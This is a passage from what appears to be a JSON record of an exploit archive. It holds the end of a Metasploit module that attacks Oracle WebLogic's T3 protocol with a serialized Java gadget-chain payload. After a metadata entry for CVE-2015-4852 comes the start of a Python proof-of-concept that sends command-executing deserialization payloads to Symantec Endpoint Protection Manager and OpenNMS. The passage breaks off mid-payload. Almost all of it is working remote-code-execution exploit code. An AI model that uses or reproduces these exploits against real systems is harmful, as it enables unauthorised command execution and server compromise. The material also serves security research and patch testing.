#data << '3234322e3231342e312e323534' # original string = 242.214.1.254\r

data << '3030302e3030302e3030302e30' # new string = 000.000.000.0\r

# (must be an IP, and length isn't trivially editable)\r

\r

#data << '61863d1d' # original string = ??? UNKNOWN ???\r

data << rand_text_alphanumeric(4).unpack('H*')[0] # new = randomized\r

\r

data << '00000000' # NULL BYTES\r

data << '78' # block footer\r

\r

sock.put([data].pack('H*'))\r

sleep(1)\r

sock.get_once\r

end\r

\r

def send_payload_objdata\r

# payload creation\r

if target.name == 'Windows'\r

mycmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})\r

elsif target.name == 'Unix' || target.name == 'Solaris'\r

mycmd = payload.encoded\r

end\r

\r

# basic weblogic ClassTableEntry object (serialized)\r

# TODO: WHAT DOES THIS DO? CAN WE RANDOMIZE ANY OF IT?\r

payload = '056508000000010000001b0000005d0101007372017870737202787000000000'\r

payload << '00000000757203787000000000787400087765626c6f67696375720478700000'\r

payload << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306'\r

\r

payload << 'fe010000' # ----- separator -----\r

\r

payload << 'aced0005' # JSO v5 header\r

payload << '73' # object header\r

payload << '72' # class\r

payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry\r

payload << '73735461626c65456e747279' # (cont)\r

payload << '2f52658157f4f9ed' # serialVersionUID\r

payload << '0c' # EXTERNALIZABLE | BLOCKDATA\r

payload << '0000' # fieldCount = 0\r

payload << '7870' # remaining object header\r

payload << '72' # class header\r

payload << '00025b42' # Name: 0x5b42\r

payload << 'acf317f8060854e0' # serialVersionUID\r

payload << '02' # SERIALIZABLE\r

payload << '0000' # fieldCount = 0\r

payload << '7870' # class footer\r

payload << '77' # block header\r

payload << '020000' # contents = 0x0000\r

payload << '78' # block footer\r

\r

payload << 'fe010000' # ----- separator -----\r

\r

payload << 'aced0005' # JSO v5 header\r

payload << '73' # object header\r

payload << '72' # class\r

payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry\r

payload << '73735461626c65456e747279' # (cont)\r

payload << '2f52658157f4f9ed' # serialVersionUID\r

payload << '0c' # EXTERNALIZABLE | BLOCKDATA\r

payload << '0000' # fieldCount = 0\r

payload << '7870' # remaining object header\r

payload << '72' # class header\r

\r

payload << '00135b4c6a6176612e6c616e672e4f626a' # Name: [Ljava.lang.Object;\r

payload << '6563743b' # (cont)\r

payload << '90ce589f1073296c' # serialVersionUID\r

payload << '02' # SERIALIZABLE\r

payload << '0000' # fieldCount = 0\r

payload << '7870' # remaining object header\r

payload << '77' # block header\r

payload << '020000' # contents = 0x0000\r

payload << '78' # block footer\r

\r

payload << 'fe010000' # ----- separator -----\r

\r

payload << 'aced0005' # JSO v5 header\r

payload << '73' # object header\r

payload << '72' # class\r

\r

payload << '001d7765626c6f6769632e726a766d2e436c61' # Name: weblogic.rjvm.ClassTableEntry\r

payload << '73735461626c65456e747279' # (cont)\r

payload << '2f52658157f4f9ed' # serialVersionUID\r

payload << '0c' # SERIALIZABLE | BLOCKDATA\r

payload << '0000' # fieldCount = 0\r

payload << '7870' # block footer\r

payload << '72' # class header\r

payload << '00106a6176612e7574696c2e566563746f72' # Name: java.util.Vector\r

payload << 'd9977d5b803baf01' # serialVersionUID\r

payload << '03' # WRITE_METHOD | SERIALIZABLE\r

payload << '0003' # fieldCount = 3\r

payload << '4900116361706163697479496e6372656d656e74' # 0: Int: capacityIncrement\r

payload << '49000c656c656d656e74436f756e74' # 1: Int: elementCount\r

payload << '5b000b656c656d656e7444617461' # 2: Array: elementData\r

payload << '7400135b4c6a6176612f6c616e672f4f626a6563' # 3: String: [Ljava/lang/Object;\r

payload << '743b' # (cont)\r

payload << '7870' # remaining object header\r

payload << '77' # block header\r

payload << '020000' # contents = 0x0000\r

payload << '78' # block footer\r

\r

payload << 'fe010000' # ----- separator -----\r

\r

ysoserial_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload(\"CommonsCollections1\",mycmd)\r

payload << ysoserial_payload.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join\r

\r

payload << 'fe010000' # ----- separator -----\r

\r

# basic weblogic ImmutableServiceContext object (serialized)\r

payload << 'aced0005' # JSO v5 header\r

payload << '73' # object header\r

payload << '72' # class\r

payload << '00257765626c6f6769632e726a766d2e496d6d75' # Name: weblogic.rjvm.ImmutableServiceContext\r

payload << '7461626c6553657276696365436f6e74657874' # (cont)\r

payload << 'ddcba8706386f0ba' # serialVersionUID\r

payload << '0c' # EXTERNALIZABLE | BLOCKDATA\r

payload << '0000' # fieldCount = 0\r

payload << '78' # object footer\r

payload << '72' # block header\r

payload << '00297765626c6f6769632e726d692e70726f76' # Name: weblogic.rmi.provider.BasicServiceContext\r

payload << '696465722e426173696353657276696365436f' # (cont)\r

payload << '6e74657874' # (cont)\r

payload << 'e4632236c5d4a71e' # serialVersionUID\r

payload << '0c' # EXTERNALIZABLE | BLOCKDATA\r

payload << '0000' # fieldCount = 0\r

payload << '7870' # block footer\r

payload << '77' # block header\r

payload << '020600' # contents = 0x0600\r

payload << '7372' # class descriptor\r

payload << '00267765626c6f6769632e726d692e696e7465' # Name: weblogic.rmi.internal.MethodDescriptor\r

payload << '726e616c2e4d6574686f644465736372697074' # (cont)\r

payload << '6f72' # (cont)\r

payload << '12485a828af7f67b' # serialVersionUID\r

payload << '0c' # EXTERNALIZABLE | BLOCKDATA\r

payload << '0000' # fieldCount = 0\r

payload << '7870' # class footer\r

payload << '77' # class data\r

\r

#payload << '34002e61757468656e746963617465284c7765' # old contents = 0x002e61757468656e746963617465284c7765\r

#payload << '626c6f6769632e73656375726974792e61636c' # 626c6f6769632e73656375726974792e61636c\r

#payload << '2e55736572496e666f3b290000001b' # 2e55736572496e666f3b290000001b\r

payload << rand_text_alphanumeric(52).unpack('H*')[0] # new = randomized\r

payload << '78' # class footer\r

payload << '78' # block footer\r

# MISSING OBJECT FOOTER (0x78)\r

\r

payload << 'fe00ff' # this cruft again. some kind of footer\r

\r

# sets the length of the stream\r

data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')\r

data << payload\r

\r

sock.put([data].pack('H*'))\r

sleep(1)\r

sock.get_once\r

\r

end\r

\r

def exploit\r

connect\r

\r

print_status('Sending handshake...')\r

t3_handshake\r

\r

print_status('Sending T3 request object...')\r

build_t3_request_object\r

\r

print_status('Sending client object payload...')\r

send_payload_objdata\r

\r

handler\r

disconnect\r

end\r

end", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/46628"}, {"lastseen": "2018-05-24T14:18:40", "description": "Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization Remote Code Execution. CVE-2015-4852. Remote exploit for Multiple platform", "published": "2016-07-20T00:00:00", "type": "exploitdb", "title": "Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4852"], "modified": "2016-07-20T00:00:00", "id": "EDB-ID:44552", "href": "https://www.exploit-db.com/exploits/44552/", "sourceData": "#! /bin/bash/env python3\r

#\r

# ____ _ _ _ \r

# / ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r

# \\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r

# ___) | __/ | | | (_| | | (_| | || (_) | | \r

# |____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r

#\r

# By Nikhil Sreekumar (@roo7break)\r

#\r

\r

import sys\r

import base64\r

import httplib2\r

import socket\r

import argparse\r

import socket\r

import os\r

import struct\r

import ctypes\r

\r

version = \"0.1\"\r

banner = \"\"\"\r

____ _ _ _ \r

/ ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r

\\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r

___) | __/ | | | (_| | | (_| | || (_) | | \r

|____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r

by Nikhil Sreekumar (@roo7break) v %s\r

\r

\"\"\" % version\r

\r

def hex2raw3(teststr):\r

\"\"\"\r

This function takes a string (expecting hexstring) and returns byte string\r

\"\"\"\r

# From: HexToByte() at http://code.activestate.com/recipes/510399-byte-to-hex-and-hex-to-byte-string-conversion/\r

bytes = []\r

teststr = ''.join( teststr.split(\" \") )\r

for i in range(0, len(teststr), 2):\r

bytes.append( chr( int (teststr[i:i+2], 16 ) ) )\r

return \"\".join(bytes)\r

\r

def symantec_endpoint_attack(HOST, PORT, SSL_On, _cmd):\r

# The below code is based on the symantec_endpoint_prot_mgr_2015_6554.nasl script within Nessus\r

\"\"\"\r

This function sets up the attack payload for Symantec Endpoint\r

\"\"\"\r

\r

java_payload = '\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x6
3\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x04\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x25\\x63\\x6f\\x6d\\x2e\\x73\\x79\\x67\\x61\\x74\\x65\\x2e\\x73\\x63\\x6d\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x52\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x0
2\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0e\\x72\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x4c\\x69\\x6e\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x76\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x01\\x75\\x71\\x00\\x7e\\x00\\x20\\x00\\x00\\x00\\x03\\x74\\x00\\x07\\x63\\x6d\\x64\\x2e\\x65\\x78\\x65\\x74\\x00\\x02\\x2f\\x63\\x74\\x00'\r

\r

cleng = len(_cmd)\r

java_payload += chr(cleng) + _cmd\r

java_payload += '\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a'\r

\r

fullpayload = \"\"\"------=_Part_0_992568364.1449677528532\r

Content-Type: application/binary\r

Content-Disposition: form-data; name=\"Content\"\r

\r

%s \r

\r

------=_Part_0_992568364.1449677528532--\r

\"\"\" % java_payload\r

\r

if SSL_On:\r

webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r

URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r

else:\r

webservice = httplib2.Http()\r

URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r

\r

headers = {\"User-Agent\":\"Symantec_RCE_POC\",\r

\"Content-type\":\"multipart/form-data;\",\r

\"boundary\":\"----=_Part_0_992568364.1449677528532\",\r

\"Accept\":\"text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\\r\

\",\r

\"Connection\":\"keep-alive\",\r

\"Content-length\":\"%d\" % len(fullpayload)\r

}\r

resp, content = webservice.request(URL_ADDR+\"/servlet/ConsoleServlet?ActionType=SendStatPing\", \"POST\", body=fullpayload, headers=headers)\r

# print provided response.\r

print(\"[i] Response received from target: %s\" % resp)\r

\r

def opennms_attack(HOST, PORT, _cmd):\r

# The below code is based on the opennms_java_serialize.nasl script within Nessus\r

\"\"\"\r

This function sets up the attack payload for OpenNMS\r

\"\"\"\r

clen = len(_cmd)\r

d1 = '\\x4a\\x52\\x4d\\x49\\x00\\x02\\x4b'\r

d2 = '\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x00\\x00\\x00\\x50\\xac\\xed\\x00\\x05\\x77\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x15\\x4d\\xc9\\xd4\\xe6\\x3b\\xdf\\x74\\x00\\x05\\x70\\x77\\x6e\\x65\\x64\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0f\\x6a\\x61\\x76\\x61\\x2e\\x72\\x6d\\x69\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x70\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x0c\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x00\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6
a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x70\\x78\\x71\\x00\\x7e\\x00\\x02\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6
